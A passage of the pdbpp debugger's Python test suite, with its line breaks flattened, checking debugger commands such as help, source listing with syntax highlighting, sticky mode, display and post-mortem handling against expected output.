[NUM] > .*fn() -> a = 4 5 frames hidden .* a: 2 --> 3 # c """) def test_forget_with_new_pdb(): """Regression test for having used local.GLOBAL_PDB in forget. This caused "AttributeError: 'NewPdb' object has no attribute 'lineno'", e.g. when pdbpp was used before pytest's debugging plugin was setup, which then later uses a custom Pdb wrapper. 
""" def fn(): set_trace() class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") return super(NewPdb, self).set_trace(*args) new_pdb = NewPdb() new_pdb.set_trace() check(fn, """ [NUM] > .*fn() -> class NewPdb(PdbTest, pdb.Pdb): 5 frames hidden .* # c new_set_trace --Return-- [NUM] .*set_trace()->None -> return super(NewPdb, self).set_trace(\\*args) 5 frames hidden .* # l NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* NUM .* # c """) def test_global_pdb_with_classmethod(): def fn(): global pdb set_trace() assert isinstance(pdb.local.GLOBAL_PDB, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") assert pdb.local.GLOBAL_PDB is self ret = super(NewPdb, self).set_trace(*args) assert pdb.local.GLOBAL_PDB is self return ret new_pdb = NewPdb() new_pdb.set_trace() check(fn, """ [NUM] > .*fn() -> assert isinstance(pdb.local.GLOBAL_PDB, PdbTest) 5 frames hidden .* # c new_set_trace [NUM] .*set_trace() -> assert pdb.local.GLOBAL_PDB is self 5 frames hidden .* # c """) def test_global_pdb_via_new_class_in_init_method(): def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(pdb.local.GLOBAL_PDB, PdbTest) class PdbLikePytest(object): @classmethod def init_pdb(cls): class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, frame): print("new_set_trace") super(NewPdb, self).set_trace(frame) return NewPdb() @classmethod def set_trace(cls, *args, **kwargs): frame = sys._getframe().f_back pdb_ = cls.init_pdb(*args, **kwargs) return pdb_.set_trace(frame) PdbLikePytest.set_trace() second = pdb.local.GLOBAL_PDB assert first != second PdbLikePytest.set_trace() third = pdb.local.GLOBAL_PDB assert third == second check(fn, """ [NUM] > .*fn() -> first = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] > .*fn() -> second = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] > .*fn() -> third = pdb.local.GLOBAL_PDB 5 frames hidden .* # c """) def test_global_pdb_via_existing_class_in_init_method(): def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(pdb.local.GLOBAL_PDB, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, frame): print("new_set_trace") super(NewPdb, self).set_trace(frame) class PdbViaClassmethod(object): @classmethod def init_pdb(cls): return NewPdb() @classmethod def set_trace(cls, *args, **kwargs): frame = sys._getframe().f_back pdb_ = cls.init_pdb(*args, **kwargs) return pdb_.set_trace(frame) PdbViaClassmethod.set_trace() second = pdb.local.GLOBAL_PDB assert first != second PdbViaClassmethod.set_trace() third = pdb.local.GLOBAL_PDB assert third == second check(fn, """ [NUM] > .*fn() -> first = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] > .*fn() -> second = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] > .*fn() -> third = pdb.local.GLOBAL_PDB 5 frames hidden .* # c """) def test_global_pdb_can_be_skipped(): def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(first, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") assert pdb.local.GLOBAL_PDB is not self ret = super(NewPdb, self).set_trace(*args) assert pdb.local.GLOBAL_PDB is not self return ret new_pdb = NewPdb(use_global_pdb=False) new_pdb.set_trace() assert pdb.local.GLOBAL_PDB is not new_pdb set_trace(cleanup=False) assert pdb.local.GLOBAL_PDB is not new_pdb check(fn, """ [NUM] > .*fn() -> first = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] .*set_trace() -> assert 
pdb.local.GLOBAL_PDB is not self 5 frames hidden .* # readline_ = pdb.local.GLOBAL_PDB.fancycompleter.config.readline # assert readline_.get_completer() != pdb.local.GLOBAL_PDB.complete # c [NUM] > .*fn() -> assert pdb.local.GLOBAL_PDB is not new_pdb 5 frames hidden .* # c """) def test_global_pdb_can_be_skipped_unit(monkeypatch_pdb_methods): """Same as test_global_pdb_can_be_skipped, but with mocked Pdb methods.""" def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(first, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") assert pdb.local.GLOBAL_PDB is not self ret = super(NewPdb, self).set_trace(*args) assert pdb.local.GLOBAL_PDB is not self return ret new_pdb = NewPdb(use_global_pdb=False) new_pdb.set_trace() assert pdb.local.GLOBAL_PDB is not new_pdb set_trace(cleanup=False) assert pdb.local.GLOBAL_PDB is not new_pdb check(fn, """ === set_trace new_set_trace === set_trace === set_trace """) def test_global_pdb_can_be_skipped_but_set(): def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(first, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") assert pdb.local.GLOBAL_PDB is self ret = super(NewPdb, self).set_trace(*args) assert pdb.local.GLOBAL_PDB is self return ret new_pdb = NewPdb(use_global_pdb=False, set_global_pdb=True) new_pdb.set_trace() assert pdb.local.GLOBAL_PDB is new_pdb set_trace(cleanup=False) assert pdb.local.GLOBAL_PDB is new_pdb check(fn, """ [NUM] > .*fn() -> first = pdb.local.GLOBAL_PDB 5 frames hidden .* # c new_set_trace [NUM] .*set_trace() -> assert pdb.local.GLOBAL_PDB is self 5 frames hidden .* # readline_ = pdb.local.GLOBAL_PDB.fancycompleter.config.readline # assert readline_.get_completer() == pdb.local.GLOBAL_PDB.complete # c new_set_trace [NUM] > .*fn() -> assert pdb.local.GLOBAL_PDB is new_pdb 5 frames hidden .* # c """) def test_global_pdb_can_be_skipped_but_set_unit(monkeypatch_pdb_methods): def fn(): set_trace() first = pdb.local.GLOBAL_PDB assert isinstance(first, PdbTest) class NewPdb(PdbTest, pdb.Pdb): def set_trace(self, *args): print("new_set_trace") assert pdb.local.GLOBAL_PDB is self ret = super(NewPdb, self).set_trace(*args) assert pdb.local.GLOBAL_PDB is self return ret new_pdb = NewPdb(use_global_pdb=False, set_global_pdb=True) new_pdb.set_trace() assert pdb.local.GLOBAL_PDB is new_pdb set_trace(cleanup=False) assert pdb.local.GLOBAL_PDB is new_pdb check(fn, """ === set_trace new_set_trace === set_trace new_set_trace === set_trace """) def test_single_question_mark(): def fn(): def f2(x, y): """Return product of x and y""" return x * y set_trace() a = 1 b = 2 c = 3 return a+b+c # import pdb; pdb.set_trace() check(fn, """ [NUM] > .*fn() -> a = 1 5 frames hidden .* # f2 <function .*f2 at .*> # f2? .*Type:.*function .*String Form:.*<function .*f2 at .*> ^[[31;01mFile:^[[00m {filename} .*Definition:.*f2(x, y) .*Docstring:.*Return product of x and y # c """.format( filename=__file__, )) def test_double_question_mark(): def fn(): def f2(x, y): """Return product of x and y""" return x * y set_trace() a = 1 b = 2 c = 3 return a+b+c check(fn, r""" [NUM] > .*fn() -> a = 1 5 frames hidden .* # f2 <function .*f2 at .*> # f2?? 
.*Type:.*function .*String Form:.*<function .*f2 at .*> ^[[31;01mFile:^[[00m {filename} .*Definition:.*f2(x, y) .*Docstring:.*Return product of x and y .*Source:.* .* def f2(x, y): .* \"\"\"Return product of x and y\"\"\" .* return x \* y # c """.format( filename=__file__, )) def test_single_question_mark_with_existing_command(monkeypatch): def mocked_inspect(self, arg): print("mocked_inspect: %r" % arg) monkeypatch.setattr(PdbTest, "do_inspect", mocked_inspect) def fn(): mp = monkeypatch # noqa: F841 class MyClass: pass a = MyClass() # noqa: F841 set_trace() check(fn, """ --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # a? mocked_inspect: 'a' # a.__class__? mocked_inspect: 'a.__class__' # !!a? # !a? do_shell_called: a? \\*\\*\\* SyntaxError: # mp.delattr(pdb.local.GLOBAL_PDB.__class__, "do_shell") # !a? \\*\\*\\* SyntaxError: # help a a(rgs) .* # c """) def test_up_local_vars(): def nested(): set_trace() return def fn(): xx = 42 # noqa: F841 nested() check(fn, """ [NUM] > .*nested() -> return 5 frames hidden .* # up [NUM] > .*fn() -> nested() # xx 42 # c """) def test_frame(): def a(): b() def b(): c() def c(): set_trace() return check(a, """ [NUM] > .*c() -> return 5 frames hidden .* # f {frame_num_a} [NUM] > .*a() -> b() # f [{frame_num_a}] > .*a() -> b() # c """.format(frame_num_a=count_frames() + 2 - 5)) @pytest.mark.skipif(sys.version_info < (3, 6), reason="only with f-strings") def test_fstrings(monkeypatch): def mocked_inspect(self, arg): print("mocked_inspect: %r" % arg) monkeypatch.setattr(PdbTest, "do_inspect", mocked_inspect) def f(): set_trace() check(f, """ --Return-- [NUM] > .* -> set_trace() 5 frames hidden .* # f"fstring" 'fstring' # f"foo"? mocked_inspect: 'f"foo"' # c """) def test_prefixed_strings(monkeypatch): def mocked_inspect(self, arg): print("mocked_inspect: %r" % arg) monkeypatch.setattr(PdbTest, "do_inspect", mocked_inspect) def f(): set_trace() check( f, """ --Return-- [NUM] > .* -> set_trace() 5 frames hidden .* # b"string" {bytestring!r} # u"string" {unicodestring!r} # r"string" 'string' # b"foo"? mocked_inspect: 'b"foo"' # r"foo"? mocked_inspect: 'r"foo"' # u"foo"? 
mocked_inspect: 'u"foo"' # c """.format(bytestring=b"string", unicodestring=u"string")) def test_up_down_arg(): def a(): b() def b(): c() def c(): set_trace() return check(a, """ [NUM] > .*c() -> return 5 frames hidden .* # up 3 [NUM] > .*runpdb() -> func() # down 1 [NUM] > .*a() -> b() # c """) def test_parseline(): def fn(): c = 42 set_trace() return c check(fn, """ [NUM] > .*fn() -> return c 5 frames hidden .* # c 42 # !c do_shell_called: 'c' 42 # r = 5 # r 5 # r = 6 # r 6 # !!c """) def test_parseline_with_rc_commands(tmpdir, monkeypatch): """Test that parseline handles execution of rc lines during setup.""" monkeypatch.delenv("HOME", raising=False) monkeypatch.delenv("USERPROFILE", raising=False) with tmpdir.as_cwd(): with open(".pdbrc", "w") as f: f.writelines([ "p 'readrc'\n", "alias myalias print(%1)\n", ]) def fn(): alias = "trigger" # noqa: F841 set_trace(readrc=True) check(fn, """ --Return-- 'readrc' [NUM] > .*fn()->None -> set_trace(readrc=True) 5 frames hidden .* # alias myalias \\*\\*\\* SyntaxError # !!alias myalias myalias = print(%1) # myalias 42 42 # c """) def test_parseline_with_existing_command(): def fn(): c = 42 set_trace() return c check(fn, """ [NUM] > .*fn() -> return c 5 frames hidden .* # print(pdb.local.GLOBAL_PDB.parseline("foo = ")) ('foo', '=', 'foo =') # print(pdb.local.GLOBAL_PDB.parseline("c = ")) (None, None, 'c = ') # print(pdb.local.GLOBAL_PDB.parseline("a = ")) (None, None, 'a = ') # print(pdb.local.GLOBAL_PDB.parseline("list()")) (None, None, 'list()') # c 42 # cont """) def test_args_name(): def fn(): args = 42 set_trace() return args check(fn, """ [NUM] > .*fn() -> return args 5 frames hidden .* # args 42 # c """) def lineno(): """Returns the current line number in our program.""" return inspect.currentframe().f_back.f_lineno @pytest.mark.parametrize("command,expected_regex", [ ("", r"Documented commands \(type help <topic>\):"), ("EOF", "Handles the receipt of EOF as a command."), ("a", "Print the argument"), ("alias", "an alias"), ("args", "Print the argument"), ("b", "set a break"), ("break", "set a break"), ("bt", "Print a stack trace"), ("c", "Continue execution, only stop when a breakpoint"), ("cl", "clear all breaks"), ("clear", "clear all breaks"), ("commands", "Specify a list of commands for breakpoint"), ("condition", "must evaluate to true"), ("cont", "Continue execution, only stop when a breakpoint"), ("continue", "Continue execution, only stop when a breakpoint"), ("d", "Move the current frame .* down"), ("debug", "Enter a recursive debugger"), ("disable", "Disables the breakpoints"), ("display", "Add expression to the display list"), ("down", "Move the current frame .* down"), ("ed", "Open an editor"), ("edit", "Open an editor"), ("enable", "Enables the breakpoints"), ("exit", "Quit from the debugger."), ("h", "h(elp)"), ("help", "h(elp)"), ("hf_hide", "hide hidden frames"), ("hf_unhide", "unhide hidden frames"), ("ignore", "ignore count for the given breakpoint"), ("interact", "Start an interative interpreter"), ("j", "Set the next line that will be executed."), ("jump", "Set the next line that will be executed."), ("l", "List source code for the current file."), ("list", "List source code for the current file."), ("ll", "List source code for the current function."), ("longlist", "List source code for the current function."), ("n", "Continue execution until the next line"), ("next", "Continue execution until the next line"), ("p", "Print the value of the expression"), ("pp", "Pretty-print the value of the expression."), ("q", "Quit 
from the debugger."), ("quit", "Quit from the debugger."), ("r", "Continue execution until the current function returns."), ("restart", "Restart the debugged python program."), ("return", "Continue execution until the current function returns."), ("run", "Restart the debugged python program"), ("s", "Execute the current line, stop at the first possible occasion"), ("step", "Execute the current line, stop at the first possible occasion"), ("sticky", "Toggle sticky mode"), ("tbreak", "arguments as break"), ("track", "track expression"), ("u", "Move the current frame .* up"), ("unalias", "specified alias."), ("undisplay", "Remove expression from the display list"), ("unt", "until the line"), ("until", "until the line"), ("up", "Move the current frame .* up"), ("w", "Print a stack trace"), ("whatis", "Prints? the type of the argument."), ("where", "Print a stack trace"), ("hidden_frames", "Some frames might be marked as \"hidden\""), ("exec", r"Execute the \(one-line\) statement"), ("hf_list", r"\*\*\* No help"), ("paste", r"\*\*\* No help"), ("put", r"\*\*\* No help"), ("retval", r"\*\*\* No help|return value"), ("rv", r"\*\*\* No help|return value"), ("source", r"\*\*\* No help"), ("unknown_command", r"\*\*\* No help"), ("help", "print the list of available commands."), ]) def test_help(command, expected_regex): from pdb import StringIO instance = PdbTest() instance.stdout = StringIO() # Redirect sys.stdout because Python 2 pdb.py has `print >>self.stdout` for # some functions and plain ol' `print` for others. oldstdout = sys.stdout sys.stdout = instance.stdout try: instance.do_help(command) finally: sys.stdout = oldstdout output = instance.stdout.getvalue() assert re.search(expected_regex, output) def test_shortlist(): def fn(): a = 1 set_trace(Config=ConfigTest) return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # l {line_num}, 3 NUM +\t def fn(): NUM +\t a = 1 NUM +\t set_trace(Config=ConfigTest) NUM +-> return a # c """.format(line_num=fn.__code__.co_firstlineno)) def test_shortlist_with_pygments_and_EOF(): def fn(): a = 1 set_trace(Config=ConfigWithPygments) return a check(fn, """ [NUM] > .*fn() -> ^[[38;5;28;01mreturn^[[39;00m a 5 frames hidden .* # l {line_num}, 3 [EOF] # c """.format(line_num=100000)) def test_shortlist_with_highlight_and_EOF(): def fn(): a = 1 set_trace(Config=ConfigWithHighlight) return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # l {line_num}, 3 [EOF] # c """.format(line_num=100000)) def test_shortlist_with_pygments(): def fn(): a = 1 set_trace(Config=ConfigWithPygments) return a check(fn, """ [NUM] > .*fn() -> ^[[38;5;28;01mreturn^[[39;00m a 5 frames hidden .* # l {line_num}, 5 NUM +\t$ NUM +\t ^[[38;5;28;01mdef^[[39;00m ^[[38;5;21mfn^[[39m(): NUM +\t a ^[[38;5;241m=^[[39m ^[[38;5;241m1^[[39m NUM +\t set_trace(Config^[[38;5;241m=^[[39mConfigWithPygments) NUM +\t$ NUM +->\t ^[[38;5;28;01mreturn^[[39;00m a # c """.format(line_num=fn.__code__.co_firstlineno - 1)) def test_shortlist_with_highlight(): def fn(): a = 1 set_trace(Config=ConfigWithHighlight) return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # l {line_num}, 4 <COLORNUM> +\t def fn(): <COLORNUM> +\t a = 1 <COLORNUM> +\t set_trace(Config=ConfigWithHighlight) <COLORNUM> +\t$ <COLORNUM> +->\t return a # c """.format(line_num=fn.__code__.co_firstlineno)) def test_shortlist_without_arg(): """Ensure that forget was called for lineno.""" def fn(): a = 1 set_trace(Config=ConfigTest) return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # l NUM 
\tdef test_shortlist_without_arg(): NUM \t \"""Ensure that forget was called for lineno.\""" .* .* .* .* .* .* .* NUM \t-> return a NUM \t 5 frames hidden .* # c """.format(line_num=fn.__code__.co_firstlineno)) def test_shortlist_heuristic(): def fn(): a = 1 set_trace(Config=ConfigTest) return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # list {line_num}, 3 NUM \t def fn(): NUM \t a = 1 NUM \t set_trace(Config=ConfigTest) NUM -> return a # list(range(4)) [0, 1, 2, 3] # c """.format(line_num=fn.__code__.co_firstlineno)) def test_shortlist_with_second_set_trace_resets_lineno(): def fn(): def f1(): set_trace(cleanup=False) set_trace() f1() check(fn, r""" [NUM] > .*fn() -> f1() 5 frames hidden .* # l {line_num}, 2 NUM \t def fn(): NUM \t def f1(): NUM \t set_trace(cleanup=False) # import pdb; pdb.local.GLOBAL_PDB.lineno {set_lineno} # c --Return-- [NUM] > .*f1()->None -> set_trace(cleanup=False) 5 frames hidden .* # import pdb; pdb.local.GLOBAL_PDB.lineno # c """.format( line_num=fn.__code__.co_firstlineno, set_lineno=fn.__code__.co_firstlineno + 2, )) def test_longlist(): def fn(): a = 1 set_trace() return a check(fn, """ [NUM] > .*fn() -> return a 5 frames hidden .* # ll NUM def fn(): NUM a = 1 NUM set_trace() NUM -> return a # c """) def test_longlist_with_highlight(): def fn(): a = 1 set_trace(Config=ConfigWithHighlight) return a check(fn, r""" [NUM] > .*fn() -> return a 5 frames hidden .* # ll <COLORNUM> def fn(): <COLORNUM> a = 1 <COLORNUM> set_trace(Config=ConfigWithHighlight) ^[[39;49;7m^[[36;01;39;49;7m\d+^[[00;39;49;7m -> return a ^[[00m # c """) # noqa: E501 def test_display(): def fn(): a = 1 set_trace() b = 1 # noqa: F841 a = 2 a = 3 return a check(fn, """ [NUM] > .*fn() -> b = 1 5 frames hidden .* # display a # n [NUM] > .*fn() -> a = 2 5 frames hidden .* # n [NUM] > .*fn() -> a = 3 5 frames hidden .* a: 1 --> 2 # undisplay a # n [NUM] > .*fn() -> return a 5 frames hidden .* # c """) def test_display_undefined(): def fn(): set_trace() b = 42 return b check(fn, """ [NUM] > .*fn() -> b = 42 5 frames hidden .* # display b # n [NUM] > .*fn() -> return b 5 frames hidden .* b: <undefined> --> 42 # c """) def test_sticky(): def fn(): set_trace() a = 1 b = 2 # noqa: F841 c = 3 # noqa: F841 return a check(fn, """ [NUM] > .*fn() -> a = 1 5 frames hidden .* # sticky <CLEARSCREEN> >.* NUM def fn(): NUM set_trace() NUM -> a = 1 NUM b = 2 NUM c = 3 NUM return a # n [NUM] > .*fn() -> b = 2 5 frames hidden .* <CLEARSCREEN> >.* NUM def fn(): NUM set_trace() NUM a = 1 NUM -> b = 2 NUM c = 3 NUM return a # sticky # n [NUM] > .*fn() -> c = 3 5 frames hidden .* # c """) def test_sticky_range(): def fn(): set_trace() a = 1 b = 2 # noqa: F841 c = 3 # noqa: F841 return a _, lineno = inspect.getsourcelines(fn) start = lineno + 1 end = lineno + 3 check(fn, """ [NUM] > .*fn() -> a = 1 5 frames hidden .* # sticky %d %d <CLEARSCREEN> >.* %d \\s+ set_trace() NUM -> a = 1 NUM b = 2 # c """ % (start, end, start)) def test_sticky_by_default(): class MyConfig(ConfigTest): sticky_by_default = True def fn(): set_trace(Config=MyConfig) a = 1 b = 2 # noqa: F841 c = 3 # noqa: F841 return a check(fn, """ [NUM] > .*fn() -> a = 1 5 frames hidden .* .* NUM def fn(): NUM set_trace(Config=MyConfig) NUM -> a = 1 NUM b = 2 NUM c = 3 NUM return a # n [NUM] > .*fn() -> b = 2 5 frames hidden .* <CLEARSCREEN> >.* NUM def fn(): NUM set_trace(Config=MyConfig) NUM a = 1 NUM -> b = 2 NUM c = 3 NUM return a # c """) def test_sticky_dunder_exception(): """Test __exception__ being displayed in sticky mode.""" def fn(): 
def raises(): raise InnerTestException() set_trace() raises() check(fn, """ [NUM] > .*fn() -> raises() 5 frames hidden (try 'help hidden_frames') # n .*InnerTestException.* ### via pdb.Pdb.user_exception (differs on py3/py27) [NUM] > .*fn() -> raises() 5 frames hidden .* # sticky <CLEARSCREEN> > {filename}(NUM) NUM def fn(): NUM def raises(): NUM raise InnerTestException() NUM NUM set_trace(.*) NUM -> raises() InnerTestException: # c """.format( filename=__file__, )) def test_sticky_dunder_exception_with_highlight(): """Test __exception__ being displayed in sticky mode.""" class ConfigWithCurrentLineColor(ConfigWithHighlight): current_line_color = 44 def fn(): def raises(): raise InnerTestException() set_trace(Config=ConfigWithCurrentLineColor) raises() check(fn, """ [NUM] > .*fn() -> raises() 5 frames hidden (try 'help hidden_frames') # n .*InnerTestException.* ### via pdb.Pdb.user_exception (differs on py3/py27) [NUM] > .*fn() -> raises() 5 frames hidden .* # sticky <CLEARSCREEN> > {filename}(NUM) <COLORNUM> def fn(): <COLORNUM> def raises(): <COLORNUM> raise InnerTestException() <COLORNUM> <COLORNUM> set_trace(.*) <COLORCURLINE> -> raises().* <COLORLNUM>InnerTestException: <COLORRESET> # c """.format( filename=__file__, )) def test_format_exc_for_sticky(): _pdb = PdbTest() f = _pdb._format_exc_for_sticky assert f((Exception, Exception())) == "Exception: " exc_from_str = Exception("exc_from_str") class UnprintableExc: def __str__(self): raise exc_from_str assert f((UnprintableExc, UnprintableExc())) == ( "UnprintableExc: (unprintable exception: %r)" % exc_from_str ) class UnprintableExc: def __str__(self): class RaisesInRepr(Exception): def __repr__(self): raise Exception() raise RaisesInRepr() assert f((UnprintableExc, UnprintableExc())) == ( "UnprintableExc: (unprintable exception)" ) assert f((1, 3, 3)) == 'pdbpp: got unexpected __exception__: (1, 3, 3)' def test_sticky_dunder_return(): """Test __return__ being displayed in sticky mode.""" def fn(): def returns(): return 40 + 2 set_trace() returns() check(fn, """ [NUM] > .*fn() -> returns() 5 frames hidden (try 'help hidden_frames') # s --Call-- [NUM] > .*returns() -> def returns() 5 frames hidden .* # sticky <CLEARSCREEN> >.* NUM -> def returns(): NUM return 40 \\+ 2 # retval \\*\\*\\* Not yet returned! 
# r --Return-- [NUM] > .*(NUM)returns()->42 -> return 40 \\+ 2 5 frames hidden .* <CLEARSCREEN> > {filename}(NUM) NUM def returns(): NUM -> return 40 \\+ 2 return 42 # retval 42 # c """.format( filename=__file__, )) def test_sticky_with_user_exception_does_not_clear_screen(): def fn(): def throws(): raise InnerTestException() set_trace() throws() check(fn, """ [NUM] > .*fn() -> throws() 5 frames hidden (try 'help hidden_frames') # s --Call-- [NUM] > .*throws() -> def throws(): 5 frames hidden .* # sticky <CLEARSCREEN> >.* NUM -> def throws(): NUM raise InnerTestException() # n [NUM] > .*throws() -> raise InnerTestException() 5 frames hidden .* <CLEARSCREEN> >.* NUM def throws(): NUM -> raise InnerTestException() # n .*InnerTestException [NUM] > .*throws() -> raise InnerTestException() 5 frames hidden .* # c """) def test_sticky_dunder_return_with_highlight(): class ConfigWithPygments(ConfigWithHighlight): use_pygments = True current_line_color = 44 def fn(): def returns(): return 40 + 2 set_trace(Config=ConfigWithPygments) returns() expected, lines = run_func(fn, '# s\n# sticky\n# r\n# retval\n# c') assert lines[-4:] == [ '^[[36;01m return 42^[[00m', '# retval', '42', '# c', ] colored_cur_lines = [ x for x in lines if x.startswith('^[[44m^[[36;01;44m') and '->' in x ] assert len(colored_cur_lines) == 2 def test_exception_lineno(): def bar(): assert False def fn(): try: a = 1 # noqa: F841 bar() b = 2 # noqa: F841 except AssertionError: xpm() check(fn, """ Traceback (most recent call last): File "{filename}", line NUM, in fn bar() File "{filename}", line NUM, in bar assert False AssertionError.* [NUM] > .*bar() -> assert False # u [NUM] > .*fn() -> bar() # ll NUM def fn(): NUM try: NUM a = 1 NUM >> bar() NUM b = 2 NUM except AssertionError: NUM -> xpm() # c """.format( filename=__file__, )) def test_postmortem_noargs(): def fn(): try: a = 1 # noqa: F841 1/0 except ZeroDivisionError: pdb.post_mortem(Pdb=PdbTest) check(fn, """ [NUM] > .*fn() -> 1/0 # c """) def test_postmortem_needs_exceptioncontext(): try: # py.test bug - doesnt clear the index error from finding the next item sys.exc_clear() except AttributeError: # Python 3 doesn't have sys.exc_clear pass py.test.raises(AssertionError, pdb.post_mortem, Pdb=PdbTest) def test_exception_through_generator(): def gen(): yield 5 assert False def fn(): try: for i in gen(): pass except AssertionError: xpm() check(fn, """ Traceback (most recent call last): File "{filename}", line NUM, in fn for i in gen(): File "{filename}", line NUM, in gen assert False AssertionError.* [NUM] > .*gen() -> assert False # u [NUM] > .*fn() -> for i in gen(): # c """.format( filename=__file__, )) def test_py_code_source(): # noqa: F821 src = py.code.Source(""" def fn(): x = 42 set_trace() return x """) exec(src.compile(), globals()) check(fn, # noqa: F821 """ [NUM] > .*fn() -> return x 5 frames hidden .* # ll NUM def fn(): NUM x = 42 NUM set_trace() NUM -> return x # c """) def test_source(): def bar(): return 42 def fn(): set_trace() return bar() check(fn, """ [NUM] > .*fn() -> return bar() 5 frames hidden .* # source bar NUM def bar(): NUM return 42 # c """) def test_source_with_pygments(): def bar(): return 42 def fn(): set_trace(Config=ConfigWithPygments) return bar() check(fn, """ [NUM] > .*fn() -> ^[[38;5;28;01mreturn^[[39;00m bar() 5 frames hidden .* # source bar NUM ^[[38;5;28;01mdef^[[39;00m ^[[38;5;21mbar^[[39m(): NUM NUM ^[[38;5;28;01mreturn^[[39;00m ^[[38;5;241m42^[[39m # c """) def test_source_with_highlight(): def bar(): return 42 def fn(): 
set_trace(Config=ConfigWithHighlight) return bar() check(fn, """ [NUM] > .*fn() -> return bar() 5 frames hidden .* # source bar <COLORNUM> def bar(): <COLORNUM> <COLORNUM> return 42 # c """) def test_source_with_pygments_and_highlight(): def bar(): return 42 def fn(): set_trace(Config=ConfigWithPygmentsAndHighlight) return bar() check(fn, """ [NUM] > .*fn() -> ^[[38;5;28;01mreturn^[[39;00m bar() 5 frames hidden .* # source bar <COLORNUM> ^[[38;5;28;01mdef^[[39;00m ^[[38;5;21mbar^[[39m(): <COLORNUM> <COLORNUM> ^[[38;5;28;01mreturn^[[39;00m ^[[38;5;241m42^[[39m # c """) def test_bad_source(): def fn(): set_trace() return 42 check(fn, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # source 42 \*\* Error: .*module, class, method, function, traceback, frame, or code object .*\*\* # c """) # noqa: E501 def test_edit(): def fn(): set_trace() return 42 def bar(): fn() return 100 _, lineno = inspect.getsourcelines(fn) return42_lineno = lineno + 2 call_fn_lineno = lineno + 5 filename = os.path.abspath(__file__) if filename.endswith('.pyc'): filename = filename[:-1] check(fn, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # edit RUN emacs \+%d %s # c """ % (return42_lineno, filename)) check(bar, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # up [NUM] > .*bar() -> fn() # edit RUN emacs \+%d %s # c """ % (call_fn_lineno, filename)) def test_edit_obj(): def fn(): bar() set_trace() return 42 def bar(): pass _, bar_lineno = inspect.getsourcelines(bar) filename = os.path.abspath(__file__) if filename.endswith('.pyc'): filename = filename[:-1] check(fn, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # edit bar RUN emacs \+%d %s # c """ % (bar_lineno, filename)) def test_edit_py_code_source(): src = py.code.Source(""" def bar(): set_trace() return 42 """) _, base_lineno = inspect.getsourcelines(test_edit_py_code_source) dic = {'set_trace': set_trace} exec(src.compile(), dic) # 8th line from the beginning of the function bar = dic['bar'] src_compile_lineno = base_lineno + 8 filename = os.path.abspath(__file__) if filename.endswith('.pyc'): filename = filename[:-1] check(bar, r""" [NUM] > .*bar() -> return 42 5 frames hidden .* # edit bar RUN emacs \+%d %s # c """ % (src_compile_lineno, filename)) def test_put(tmphome): def fn(): set_trace() return 42 _, lineno = inspect.getsourcelines(fn) start_lineno = lineno + 1 check(fn, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # x = 10 # y = 12 # put RUN epaste \+%d ' x = 10\\n y = 12\\n' # c """ % start_lineno) def test_paste(): def g(): print('hello world') def fn(): set_trace() if 4 != 5: g() return 42 _, lineno = inspect.getsourcelines(fn) start_lineno = lineno + 1 check(fn, r""" [NUM] > .*fn() -> if 4 != 5: 5 frames hidden .* # g() hello world # paste g() hello world RUN epaste \+%d 'hello world\\n' # c hello world """ % start_lineno) def test_put_if(): def fn(): x = 0 if x < 10: set_trace() return x _, lineno = inspect.getsourcelines(fn) start_lineno = lineno + 3 check(fn, r""" [NUM] > .*fn() -> return x 5 frames hidden .* # x = 10 # y = 12 # put RUN epaste \+%d .*x = 10\\n y = 12\\n. 
# c """ % start_lineno) def test_side_effects_free(): r = pdb.side_effects_free assert r.match(' x') assert r.match('x.y[12]') assert not r.match('x(10)') assert not r.match(' x = 10') assert not r.match('x = 10') def test_put_side_effects_free(tmphome): def fn(): x = 10 # noqa: F841 set_trace() return 42 _, lineno = inspect.getsourcelines(fn) start_lineno = lineno + 2 check(fn, r""" [NUM] > .*fn() -> return 42 5 frames hidden .* # x 10 # x.__add__ .* # y = 12 # put RUN epaste \+%d ' y = 12\\n' # c """ % start_lineno) def test_enable_disable_via_module(): def fn(): x = 1 pdb.disable() set_trace_via_module() x = 2 pdb.enable() set_trace_via_module() return x check(fn, """ [NUM] > .*fn() -> return x 5 frames hidden .* # x 2 # c """) def test_enable_disable_from_prompt_via_class(): def fn(): pdb_ = PdbTest() pdb_.set_trace() x = 1 pdb_.set_trace() x = 2 pdb.enable() pdb_.set_trace() return x check(fn, """ [NUM] > .*fn() -> x = 1 5 frames hidden .* # pdb.disable() # c [NUM] > .*fn() -> return x 5 frames hidden .* # x 2 # c """) def test_hideframe(): @pdb.hideframe def g(): pass assert g.__code__.co_consts[-1] is pdb._HIDE_FRAME def test_hide_hidden_frames(): @pdb.hideframe def g(): set_trace() 